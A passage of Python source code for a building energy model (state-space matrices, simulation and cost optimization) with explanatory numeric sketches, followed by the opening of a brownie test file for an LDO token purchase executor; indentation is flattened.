'storage_charge_thermal_power_cooling',
'storage_charge_thermal_power_cooling'
] = 1.0
control_output_matrix[
'thermal_power_cooling_balance',
'storage_discharge_thermal_power_cooling'
] = - 1.0
control_output_matrix[
'storage_discharge_thermal_power_cooling',
'storage_discharge_thermal_power_cooling'
] = 1.0
# Sensible storage heating.
if building_data.scenarios.at['storage_commodity_type'] == 'sensible_heating':
control_output_matrix[
'thermal_power_heating_balance',
'storage_charge_thermal_power_heating'
] = 1.0
control_output_matrix[
'storage_charge_thermal_power_heating',
'storage_charge_thermal_power_heating'
] = 1.0
control_output_matrix[
'thermal_power_heating_balance',
'storage_discharge_thermal_power_heating'
] = - 1.0
control_output_matrix[
'storage_discharge_thermal_power_heating',
'storage_discharge_thermal_power_heating'
] = 1.0
# Battery storage.
if building_data.scenarios.at['storage_commodity_type'] == 'battery':
control_output_matrix[
'electric_power_balance',
'storage_charge_electric_power'
] = 1.0
control_output_matrix[
'storage_charge_electric_power',
'storage_charge_electric_power'
] = 1.0
control_output_matrix[
'electric_power_balance',
'storage_discharge_electric_power'
] = - 1.0
control_output_matrix[
'storage_discharge_electric_power',
'storage_discharge_electric_power'
] = 1.0
def define_output_plant_power():
# Cooling.
control_output_matrix[
'thermal_power_cooling_balance',
'plant_thermal_power_cooling'
] = - 1.0
control_output_matrix[
'plant_thermal_power_cooling',
'plant_thermal_power_cooling'
] = 1.0
control_output_matrix[
'electric_power_balance',
'plant_thermal_power_cooling'
] = (
1.0
/ building_data.scenarios.at['plant_cooling_efficiency']
)
# Heating.
control_output_matrix[
'thermal_power_heating_balance',
'plant_thermal_power_heating'
] = - 1.0
control_output_matrix[
'plant_thermal_power_heating',
'plant_thermal_power_heating'
] = 1.0
control_output_matrix[
'electric_power_balance',
'plant_thermal_power_heating'
] = (
1.0
/ building_data.scenarios.at['plant_heating_efficiency']
)
def define_output_grid_power():
# Electric.
control_output_matrix[
'electric_power_balance',
'grid_electric_power'
] = - 1.0
control_output_matrix[
'grid_electric_power',
'grid_electric_power'
] = 1.0
# Cooling.
control_output_matrix[
'thermal_power_cooling_balance',
'grid_thermal_power_cooling'
] = - 1.0
control_output_matrix[
'grid_thermal_power_cooling',
'grid_thermal_power_cooling'
] = 1.0
# Heating.
control_output_matrix[
'thermal_power_heating_balance',
'grid_thermal_power_heating'
] = - 1.0
control_output_matrix[
'grid_thermal_power_heating',
'grid_thermal_power_heating'
] = 1.0
def define_output_validation_surface_temperature():
for surface_name, surface_data in (
pd.concat([
building_data.surfaces_adiabatic,
building_data.surfaces_exterior,
building_data.surfaces_interior
], sort=False).iterrows()
):
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
state_output_matrix[
f'{surface_name}_temperature',
f'{surface_name}_temperature'
] = 1.0
def define_output_validation_surfaces_exterior_irradiation_gain_exterior():
for surface_name, surface_data in building_data.surfaces_exterior.iterrows():
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
disturbance_output_matrix[
f'{surface_name}_irradiation_gain_exterior',
'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_surface']
* (1 - surface_data.at['window_wall_ratio'])
)
else: # Surfaces with neglected heat capacity
disturbance_output_matrix[
surface_data.at['surface_name'] + '_irradiation_gain_exterior',
'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_surface']
* (1 - surface_data.at['window_wall_ratio'])
)
def define_output_validation_surfaces_exterior_convection_interior():
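            # Explanatory note: the combined coefficients below are series thermal
            # resistances, e.g. (1 / h_interior_convection + 1 / (2 * U_conduction))^-1
            # couples the surface temperature node (at mid-thickness) to the zone air.
            # For surfaces with neglected heat capacity, exterior convection,
            # conduction and interior convection are chained into a single
            # through-resistance.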
for surface_name, surface_data in building_data.surfaces_exterior.iterrows():
# Total zone surface area for later calculating share of interior (indirect) irradiation
zone_surface_area = sum(
zone_surface_data.at['surface_area']
* (1 - zone_surface_data.at['window_wall_ratio'])
for zone_surface_name, zone_surface_data in pd.concat(
[
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_name'] == surface_data.at['zone_name']
],
building_data.surfaces_interior[
building_data.surfaces_interior['zone_adjacent_name'] == surface_data.at['zone_name']
],
building_data.surfaces_adiabatic[
building_data.surfaces_adiabatic['zone_name'] == surface_data.at['zone_name']
]
],
sort=False
).iterrows() # For all surfaces adjacent to the zone
)
if surface_data.at['heat_capacity'] != 0.0: # Surfaces with non-zero heat capacity
# Convective heat transfer from the surface towards zone
for zone_exterior_surface_name, zone_exterior_surface_data in (
building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows()
):
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ zone_surface_area
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* (1.0 - surface_data.at['window_wall_ratio'])
* (
1.0
- (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
)
)
state_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
f'{surface_name}_temperature'
] += (
(1.0 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
)
state_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* (1.0 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_interior_convection']
)
+ 1.0
/ (
2.0
* surface_data.at['heat_transfer_coefficient_conduction_surface']
)
) ** (- 1)
)
else: # Surfaces with neglected heat capacity
# Complete convective heat transfer from surface to zone
disturbance_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
'irradiation_' + surface_data.at['direction_name']
] += (
surface_data.at['absorptivity_surface']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
)
disturbance_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
'ambient_air_temperature'
] += (
(
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
)
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
)
disturbance_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
'sky_temperature'
] += (
surface_data.at['heat_transfer_coefficient_surface_sky']
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
)
state_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
surface_data.at['zone_name'] + '_temperature'
] += (
- 1.0
* (1 - surface_data.at['window_wall_ratio'])
* (
1.0
/ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
+ 1.0
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ 1.0
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1)
)
for zone_exterior_surface_name, zone_exterior_surface_data in building_data.surfaces_exterior[
building_data.surfaces_exterior['zone_name'] == surface_data.at['zone_name']
].iterrows():
# Interior irradiation through all exterior surfaces adjacent to the zone
disturbance_output_matrix[
surface_data.at['surface_name'] + '_convection_interior',
'irradiation_' + zone_exterior_surface_data.at['direction_name']
] += (
(
zone_exterior_surface_data.at['surface_area']
* zone_exterior_surface_data.at['window_wall_ratio']
/ zone_surface_area
) # Considers the share at the respective surface
* surface_data.at['absorptivity_surface']
* (1 - surface_data.at['window_wall_ratio'])
* (1.0 - (
1.0
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ building_data.parameters.at['heat_transfer_coefficient_interior_convection']
+ (
building_data.parameters.at['heat_transfer_coefficient_exterior_convection']
+ surface_data.at['heat_transfer_coefficient_surface_ground']
+ surface_data.at['heat_transfer_coefficient_surface_sky']
)
/ (surface_data.at['heat_transfer_coefficient_conduction_surface'])
) ** (- 1))
)
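The `(...) ** (- 1)` expressions above combine convection and conduction coefficients like thermal resistances in series, so the smallest coefficient dominates the combined value. A minimal numerical sketch (coefficient values illustrative, in W/(m²K), not taken from the building data):

```python
# Combined heat transfer coefficient of three resistances in series.
heat_transfer_exterior_convection = 25.0
heat_transfer_interior_convection = 7.7
heat_transfer_conduction_surface = 2.0

combined_coefficient = (
    1.0 / heat_transfer_exterior_convection
    + 1.0 / heat_transfer_interior_convection
    + 1.0 / heat_transfer_conduction_surface
) ** -1
# The result is dominated by the smallest (conduction) coefficient.
assert combined_coefficient < heat_transfer_conduction_surface
```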
def define_disturbance_timeseries():
# Construct full disturbance timeseries from weather, internal gains and a constant term.
self.disturbance_timeseries = pd.concat(
[
building_data.weather_timeseries[[
'ambient_air_temperature',
'sky_temperature',
'irradiation_horizontal',
'irradiation_east',
'irradiation_south',
'irradiation_west',
'irradiation_north'
]],
building_data.internal_gain_timeseries,
pd.DataFrame(1.0, index=self.timesteps, columns=['constant'])
],
axis='columns',
).rename_axis('disturbance_name', axis='columns')
def define_electricity_price_timeseries():
if pd.isnull(building_data.scenarios.at['price_type']):
# If no price_type defined, generate a flat price signal.
self.electricity_price_timeseries = pd.DataFrame(
{'time': self.timesteps, 'price_type': None, 'price': 1.0},
index=self.timesteps
)
else:
self.electricity_price_timeseries = building_data.electricity_price_timeseries
def define_output_constraint_timeseries():
# Skip constraint definition if `constraint_type` is undefined for any zone.
if any(pd.isnull(building_data.zones['constraint_type'])):
logger.debug('Skipping definition of constraint timeseries due to missing constraint type definition.')
return
# Instantiate constraint timeseries.
self.output_maximum_timeseries = pd.DataFrame(
+ 1.0 * np.inf,
self.timesteps,
self.outputs
)
self.output_minimum_timeseries = pd.DataFrame(
- 1.0 * np.inf,
self.timesteps,
self.outputs
)
# Obtain indexing shorthands.
# - Indoor air quality constraints are only enforced if there is a fresh air supply device, e.g. AHU / vent.
zones_fixed_fresh_air_flow_index = (
(
pd.notnull(building_data.zones['hvac_ahu_type'])
| pd.notnull(building_data.zones['hvac_vent_type'])
)
& pd.isnull(building_data.zones['fresh_air_flow_control_type'])
)
zones_occupancy_based_index = (
(
pd.notnull(building_data.zones['hvac_ahu_type'])
| pd.notnull(building_data.zones['hvac_vent_type'])
)
& (building_data.zones['fresh_air_flow_control_type'] == 'occupancy_based')
)
zones_co2_based_index = (
(
pd.notnull(building_data.zones['hvac_ahu_type'])
| pd.notnull(building_data.zones['hvac_vent_type'])
)
& (building_data.zones['fresh_air_flow_control_type'] == 'co2_based')
)
zones_humidity_based_index = (
(
pd.notnull(building_data.zones['hvac_ahu_type'])
| pd.notnull(building_data.zones['hvac_vent_type'])
)
& (building_data.zones['humidity_control_type'] == 'humidity_based')
)
# Minimum constraint for power outputs.
self.output_minimum_timeseries.loc[
:, self.outputs.str.contains('_power')
] = 0.0
# Minimum constraint for flow outputs.
self.output_minimum_timeseries.loc[
:, self.outputs.str.contains('_flow')
] = 0.0
# Minimum / maximum constraint for balance outputs.
self.output_minimum_timeseries.loc[
:, self.outputs.str.contains('_balance')
] = 0.0
self.output_maximum_timeseries.loc[
:, self.outputs.str.contains('_balance')
] = 0.0
# Minimum / maximum constraint for zone air temperature.
self.output_minimum_timeseries.loc[
:, building_data.zones['zone_name'] + '_temperature'
] = (
building_data.constraint_timeseries.loc[
:, building_data.zones['constraint_type'] + '_minimum_air_temperature'
]
).values
self.output_maximum_timeseries.loc[
:, building_data.zones['zone_name'] + '_temperature'
] = (
building_data.constraint_timeseries.loc[
:, building_data.zones['constraint_type'] + '_maximum_air_temperature'
]
).values
# Minimum constraint for fixed zone fresh air flow.
if zones_fixed_fresh_air_flow_index.any():
self.output_minimum_timeseries.loc[
:, building_data.zones.loc[zones_fixed_fresh_air_flow_index, 'zone_name'] + '_total_fresh_air_flow'
] = (
building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_fixed_fresh_air_flow_index, 'constraint_type']
+ '_minimum_fresh_air_flow'
)
].values
)
# Minimum constraint for occupancy-based zone fresh air flow.
if zones_occupancy_based_index.any():
self.output_minimum_timeseries.loc[
:, building_data.zones.loc[zones_occupancy_based_index, 'zone_name'] + '_total_fresh_air_flow'
] = (
building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_occupancy_based_index, 'constraint_type']
+ '_minimum_fresh_air_flow_building'
)
].values
+ building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_occupancy_based_index, 'constraint_type']
+ '_minimum_fresh_air_flow_occupants'
)
].values
* building_data.internal_gain_timeseries.loc[
:, (
building_data.zones.loc[zones_occupancy_based_index, 'internal_gain_type']
+ '_internal_gain_occupancy'
)
].values
* building_data.zones.loc[zones_occupancy_based_index, 'occupancy_density'].values
)
# Maximum constraint for zone CO2 concentration.
if zones_co2_based_index.any():
self.output_maximum_timeseries.loc[
:, building_data.zones.loc[zones_co2_based_index, 'zone_name'] + '_co2_concentration'
] = (
building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_co2_based_index, 'constraint_type']
+ '_maximum_co2_concentration'
)
]
).values
# Minimum / maximum constraint for zone absolute humidity.
if zones_humidity_based_index.any():
self.output_minimum_timeseries.loc[
:, building_data.zones.loc[zones_humidity_based_index, 'zone_name'] + '_absolute_humidity'
] = (
np.vectorize(cobmo.utils.calculate_absolute_humidity_humid_air)(
building_data.scenarios.at['linearization_zone_air_temperature'],
building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_humidity_based_index, 'constraint_type']
+ '_minimum_relative_humidity'
)
]
)
)
self.output_maximum_timeseries.loc[
:, building_data.zones.loc[zones_humidity_based_index, 'zone_name'] + '_absolute_humidity'
] = (
np.vectorize(cobmo.utils.calculate_absolute_humidity_humid_air)(
building_data.scenarios.at['linearization_zone_air_temperature'],
building_data.constraint_timeseries.loc[
:, (
building_data.zones.loc[zones_humidity_based_index, 'constraint_type']
+ '_maximum_relative_humidity'
)
]
)
)
# Minimum / maximum constraints for storage state of charge.
if pd.notnull(building_data.scenarios.at['storage_type']):
self.output_minimum_timeseries.loc[
:, 'storage_state_of_charge'
] = 0.0
self.output_maximum_timeseries.loc[
:, 'storage_state_of_charge'
] = 100.0 # in %.
# Electric / thermal grid connections.
if (not connect_electric_grid) and connect_thermal_grid_cooling:
self.output_maximum_timeseries.loc[
:, 'plant_thermal_power_cooling'
] = 0.0
if (not connect_electric_grid) and connect_thermal_grid_heating:
self.output_maximum_timeseries.loc[
:, 'plant_thermal_power_heating'
] = 0.0
if not connect_thermal_grid_cooling:
self.output_maximum_timeseries.loc[
:, 'grid_thermal_power_cooling'
] = 0.0
if not connect_thermal_grid_heating:
self.output_maximum_timeseries.loc[
:, 'grid_thermal_power_heating'
] = 0.0
def discretize_model():
# Discretize state space model with zero order hold.
# - Reference: <https://en.wikipedia.org/wiki/Discretization#Discretization_of_linear_state_space_models>
state_matrix_discrete = scipy.linalg.expm(
self.state_matrix.values
* self.timestep_interval.total_seconds()
)
state_matrix_inverse = np.linalg.inv(self.state_matrix.values)
control_matrix_discrete = (
state_matrix_inverse
@ (state_matrix_discrete - np.identity(self.state_matrix.shape[0]))
@ self.control_matrix.values
)
disturbance_matrix_discrete = (
state_matrix_inverse
@ (state_matrix_discrete - np.identity(self.state_matrix.shape[0]))
@ self.disturbance_matrix.values
)
self.state_matrix[:] = state_matrix_discrete
self.control_matrix[:] = control_matrix_discrete
self.disturbance_matrix[:] = disturbance_matrix_discrete
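For reference, the zero-order-hold discretization implemented in `discretize_model` can be reproduced on a small stand-alone system and cross-checked against `scipy.signal.cont2discrete` (matrices and timestep below are illustrative, not taken from the building model):

```python
import numpy as np
import scipy.linalg
import scipy.signal

# Continuous-time system dx/dt = A x + B u (toy 2-state example).
state_matrix = np.array([[-0.1, 0.02], [0.01, -0.05]])
control_matrix = np.array([[1.0], [0.0]])
timestep_seconds = 3600.0  # one hour

# Zero-order hold: A_d = exp(A dt), B_d = A^-1 (A_d - I) B.
state_matrix_discrete = scipy.linalg.expm(state_matrix * timestep_seconds)
control_matrix_discrete = (
    np.linalg.inv(state_matrix)
    @ (state_matrix_discrete - np.identity(state_matrix.shape[0]))
    @ control_matrix
)

# Cross-check against scipy's built-in ZOH discretization.
a_d, b_d, *_ = scipy.signal.cont2discrete(
    (state_matrix, control_matrix, np.eye(2), np.zeros((2, 1))),
    dt=timestep_seconds,
    method='zoh'
)
assert np.allclose(state_matrix_discrete, a_d)
assert np.allclose(control_matrix_discrete, b_d)
```

The closed-form `A^-1 (A_d - I) B` route requires an invertible state matrix, which is why the model code inverts `self.state_matrix`.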
# Define initial state.
define_initial_state()
# Calculate parameters / coefficients.
calculate_coefficients_zone()
calculate_coefficients_surface()
calculate_coefficients_radiator()
# Define heat, CO2 and humidity transfers.
define_heat_transfer_surfaces_exterior()
define_heat_transfer_surfaces_interior()
define_heat_transfer_surfaces_adiabatic()
define_heat_transfer_infiltration()
define_heat_transfer_internal_gains()
define_heat_transfer_hvac_generic()
define_heat_transfer_hvac_radiator()
define_heat_transfer_hvac_ahu()
define_heat_transfer_hvac_tu()
define_heat_transfer_hvac_vent()
define_co2_transfer()
define_humidity_transfer()
define_storage_state_of_charge()
# Define outputs.
define_output_zone_temperature()
define_output_zone_co2_concentration()
define_output_zone_humidity()
define_output_internal_gain_power()
define_output_hvac_generic()
define_output_hvac_radiator_power()
define_output_hvac_ahu_power()
define_output_hvac_tu_power()
define_output_hvac_vent_power()
define_output_fresh_air_flow()
define_output_storage_state_of_charge()
define_output_storage_power()
define_output_plant_power()
define_output_grid_power()
# Define validation outputs.
if with_validation_outputs:
define_output_validation_surface_temperature()
define_output_validation_surfaces_exterior_irradiation_gain_exterior()
define_output_validation_surfaces_exterior_convection_interior()
# Define timeseries.
define_disturbance_timeseries()
define_electricity_price_timeseries()
define_output_constraint_timeseries()
# Convert matrix constructors to dataframes.
self.state_matrix = state_matrix.to_dataframe_dense()
self.control_matrix = control_matrix.to_dataframe_dense()
self.disturbance_matrix = disturbance_matrix.to_dataframe_dense()
self.state_output_matrix = state_output_matrix.to_dataframe_dense()
self.control_output_matrix = control_output_matrix.to_dataframe_dense()
self.disturbance_output_matrix = disturbance_output_matrix.to_dataframe_dense()
# Convert to time discrete model.
discretize_model()
def simulate(
self,
control_vector: pd.DataFrame,
state_vector_initial=None,
disturbance_timeseries=None
) -> typing.Tuple[pd.DataFrame, pd.DataFrame]:
"""Simulate building model for given control vector timeseries to obtain state vector timeseries and
output vector timeseries.
- The simulation is based on the iterative solution of the state space equations.
- The required initial state vector and disturbance timeseries are obtained from
the building model definition or can be provided through keyword arguments.
:syntax:
`building_model.simulate(control_vector)`: Simulate `building_model` for given `control_vector`.
Arguments:
control_vector (pd.DataFrame): Control vector timeseries, as dataframe with control variables as columns and
timesteps as rows.
Keyword Arguments:
state_vector_initial (pd.Series): Initial state vector values, as series with state variables as index.
Defaults to the initial state vector in the building model definition.
disturbance_timeseries (pd.DataFrame): Disturbance vector timeseries, as dataframe with disturbance
variables as columns and timesteps as rows. Defaults to the disturbance timeseries in the building
model definition.
Returns:
typing.Tuple[pd.DataFrame, pd.DataFrame]: State vector timeseries, as dataframe with timesteps as rows
and state variables as columns. Output vector timeseries, as dataframe with timesteps as rows and
output variables as columns.
"""
# Obtain initial state vector and disturbance timeseries.
if state_vector_initial is None:
state_vector_initial = self.state_vector_initial
if disturbance_timeseries is None:
disturbance_timeseries = self.disturbance_timeseries
# Initialize state and output timeseries.
state_vector = pd.DataFrame(
np.nan,
self.timesteps,
self.states
)
state_vector.loc[self.timesteps[0], :] = state_vector_initial
output_vector = pd.DataFrame(
np.nan,
self.timesteps,
self.outputs
)
# Iterative solution of the state space equations.
# - The following equations directly use the underlying numpy arrays for faster evaluation.
for timestep in range(len(self.timesteps) - 1):
state_vector.values[timestep + 1, :] = (
self.state_matrix.values @ state_vector.values[timestep, :]
+ self.control_matrix.values @ control_vector.values[timestep, :]
+ self.disturbance_matrix.values @ disturbance_timeseries.values[timestep, :]
)
for timestep in range(len(self.timesteps)):
output_vector.values[timestep, :] = (
self.state_output_matrix.values @ state_vector.values[timestep, :]
+ self.control_output_matrix.values @ control_vector.values[timestep, :]
+ self.disturbance_output_matrix.values @ disturbance_timeseries.values[timestep, :]
)
return (
state_vector,
output_vector
)
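The iterative state-space recursion in `simulate` can be exercised on a scalar toy model; all names and numbers below are illustrative, not part of the building model:

```python
import numpy as np
import pandas as pd

timesteps = pd.date_range('2021-01-01', periods=4, freq='1h')
state_matrix = np.array([[0.5]])    # x_{k+1} = 0.5 x_k + 1.0 u_k
control_matrix = np.array([[1.0]])
control_vector = pd.DataFrame(1.0, index=timesteps, columns=['control'])

state_vector = pd.DataFrame(np.nan, index=timesteps, columns=['state'])
state_vector.iloc[0, :] = 0.0
for k in range(len(timesteps) - 1):
    state_vector.iloc[k + 1, :] = (
        state_matrix @ state_vector.iloc[k, :].values
        + control_matrix @ control_vector.iloc[k, :].values
    )

# The state approaches u / (1 - a) = 2.0 from below.
assert list(state_vector['state']) == [0.0, 1.0, 1.5, 1.75]
```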
def define_optimization_variables(
self,
optimization_problem: cobmo.utils.OptimizationProblem,
):
# Define variables.
# - Variables are defined as attributes of the optimization problem object. This is for compatibility
# of `define_optimization_constraints`, etc. with `DERModelSet`.
optimization_problem.state_vector = cp.Variable((len(self.timesteps), len(self.states)))
optimization_problem.control_vector = cp.Variable((len(self.timesteps), len(self.controls)))
optimization_problem.output_vector = cp.Variable((len(self.timesteps), len(self.outputs)))
def define_optimization_constraints(
self,
optimization_problem: cobmo.utils.OptimizationProblem,
initial_state_is_final_state=False
):
# Initial state.
# - If desired, initial state is set equal to final state. This enables automatic selection of the
# optimal initial state, assuming that the start and end timestep are the same time of day.
if initial_state_is_final_state:
optimization_problem.constraints.append(
optimization_problem.state_vector[0, :]
==
optimization_problem.state_vector[-1, :]
)
# - Otherwise, set initial state according to the initial state vector.
else:
optimization_problem.constraints.append(
optimization_problem.state_vector[0, :]
==
self.state_vector_initial.values
)
# State equation.
optimization_problem.constraints.append(
optimization_problem.state_vector[1:, :]
==
cp.transpose(
self.state_matrix.values
@ cp.transpose(optimization_problem.state_vector[:-1, :])
+ self.control_matrix.values
@ cp.transpose(optimization_problem.control_vector[:-1, :])
+ self.disturbance_matrix.values
@ np.transpose(self.disturbance_timeseries.iloc[:-1, :].values)
)
)
# Output equation.
optimization_problem.constraints.append(
optimization_problem.output_vector
==
cp.transpose(
self.state_output_matrix.values
@ cp.transpose(optimization_problem.state_vector)
+ self.control_output_matrix.values
@ cp.transpose(optimization_problem.control_vector)
+ self.disturbance_output_matrix.values
@ np.transpose(self.disturbance_timeseries.values)
)
)
# Output limits.
optimization_problem.constraints.append(
optimization_problem.output_vector
>=
self.output_minimum_timeseries.values
)
optimization_problem.constraints.append(
optimization_problem.output_vector
<=
self.output_maximum_timeseries.values
)
def define_optimization_objective(
self,
optimization_problem: cobmo.utils.OptimizationProblem
):
# Obtain timestep interval in hours, for conversion of power to energy.
timestep_interval_hours = (self.timesteps[1] - self.timesteps[0]) / pd.Timedelta('1h')
# Define operation cost (OPEX).
optimization_problem.operation_cost = (
optimization_problem.output_vector[:, self.outputs.get_loc('grid_electric_power')]
* self.zone_area_total # W/m² in W.
* timestep_interval_hours / 1000.0 # W in kWh.
@ self.electricity_price_timeseries['price'].values
)
# Add to objective.
optimization_problem.objective += optimization_problem.operation_cost
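The OPEX term above converts specific power (W/m²) to building-level energy (kWh) before applying the price vector. The same arithmetic in plain numpy, with all numbers illustrative:

```python
import numpy as np

zone_area_total = 1000.0                      # m²
timestep_interval_hours = 0.5                 # 30-minute timesteps
grid_electric_power = np.array([10.0, 20.0])  # W/m² per timestep
price = np.array([0.2, 0.3])                  # currency units per kWh

operation_cost = (
    grid_electric_power
    * zone_area_total            # W/m² -> W
    * timestep_interval_hours
    / 1000.0                     # W -> kWh per timestep
) @ price
# 5 kWh * 0.2 + 10 kWh * 0.3 = 4.0
assert abs(operation_cost - 4.0) < 1e-9
```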
def get_optimization_results(
self,
optimization_problem: cobmo.utils.OptimizationProblem
) -> dict:
# Obtain results.
state_vector = (
pd.DataFrame(
optimization_problem.state_vector.value,
index=self.timesteps,
columns=self.states
)
)
control_vector = (
pd.DataFrame(
optimization_problem.control_vector.value,
index=self.timesteps,
columns=self.controls
)
)
output_vector = (
pd.DataFrame(
optimization_problem.output_vector.value,
index=self.timesteps,
columns=self.outputs
)
)
operation_cost = optimization_problem.operation_cost.value
return dict(
state_vector=state_vector,
control_vector=control_vector,
output_vector=output_vector,
operation_cost=operation_cost
)
def optimize(self):
"""Optimize the operation, i.e. the control vector, of the building model to minimize operation cost, subject to
output minimum / maximum constraints. Returns results as dictionary containing state, control and output
vector timeseries along with the operation cost.
- The price timeseries is obtained from the building model definition.
- The required initial state vector and disturbance timeseries are obtained from
the building model definition.
:syntax:
`building_model.optimize()`: Optimize the operation of `building_model` and return the results.
Returns:
dict: Results dictionary with keys `state_vector`, `control_vector`, `output_vector` and
`operation_cost`. State vector timeseries `state_vector`, as dataframe with timesteps as rows
and state variables as columns. Control vector timeseries `control_vector`, as dataframe with
timesteps as rows and control variables as columns. Output vector timeseries `output_vector`,
as dataframe with timesteps as rows and output variables as columns. Total operation cost as float `operation_cost`.
"""
# Instantiate optimization problem.
optimization_problem = cobmo.utils.OptimizationProblem()
# Define optimization problem.
self.define_optimization_variables(optimization_problem)
self.define_optimization_constraints(optimization_problem)
self.define_optimization_objective(optimization_problem)
# Solve optimization problem.
optimization_problem.solve()
# Obtain results.
results = self.get_optimization_results(optimization_problem)
return results
# --- tests/test_ldo_purchase.py (banteg/ldo-purchase-executor, MIT license) ---
import pytest
from brownie import Wei, chain, reverts
from brownie.network.state import Chain
from purchase_config import ETH_TO_LDO_RATE_PRECISION
LDO_ALLOCATIONS = [
1_000 * 10**18,
3_000_000 * 10**18,
20_000_000 * 10**18
]
# 100 LDO in one ETH
ETH_TO_LDO_RATE = 100 * 10**18
VESTING_START_DELAY = 1 * 60 * 60 * 24 * 365 # one year
VESTING_END_DELAY = 2 * 60 * 60 * 24 * 365 # two years
OFFER_EXPIRATION_DELAY = 2629746 # one month
DIRECT_TRANSFER_GAS_LIMIT = 400_000
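The tests derive each purchaser's ETH cost from the fixed-point rate convention. A quick sanity check of that arithmetic, assuming `ETH_TO_LDO_RATE_PRECISION` is `10**18` (as implied by the rate constants above; the actual value lives in `purchase_config`):

```python
ETH_TO_LDO_RATE_PRECISION = 10**18  # assumed value from purchase_config
eth_to_ldo_rate = 100 * 10**18      # 100 LDO per 1 ETH
ldo_allocation = 1_000 * 10**18     # 1,000 LDO (18 decimals)

# Cost in wei: allocation * precision // rate.
eth_cost = ldo_allocation * ETH_TO_LDO_RATE_PRECISION // eth_to_ldo_rate
assert eth_cost == 10 * 10**18  # 10 ETH
```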
@pytest.fixture(scope='function')
def executor(accounts, deploy_executor_and_pass_dao_vote):
executor = deploy_executor_and_pass_dao_vote(
eth_to_ldo_rate=ETH_TO_LDO_RATE,
vesting_start_delay=VESTING_START_DELAY,
vesting_end_delay=VESTING_END_DELAY,
offer_expiration_delay=OFFER_EXPIRATION_DELAY,
ldo_purchasers=[ (accounts[i], LDO_ALLOCATIONS[i]) for i in range(0, len(LDO_ALLOCATIONS)) ],
allocations_total=sum(LDO_ALLOCATIONS)
)
executor.start({ 'from': accounts[0] })
return executor
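The vesting entries asserted in the purchase tests below are plain offsets from the purchase timestamp, with the cliff equal to the vesting start (nothing unlocks during the first year, then tokens vest linearly over the second). Sketched with an illustrative timestamp:

```python
VESTING_START_DELAY = 1 * 60 * 60 * 24 * 365  # one year
VESTING_END_DELAY = 2 * 60 * 60 * 24 * 365    # two years

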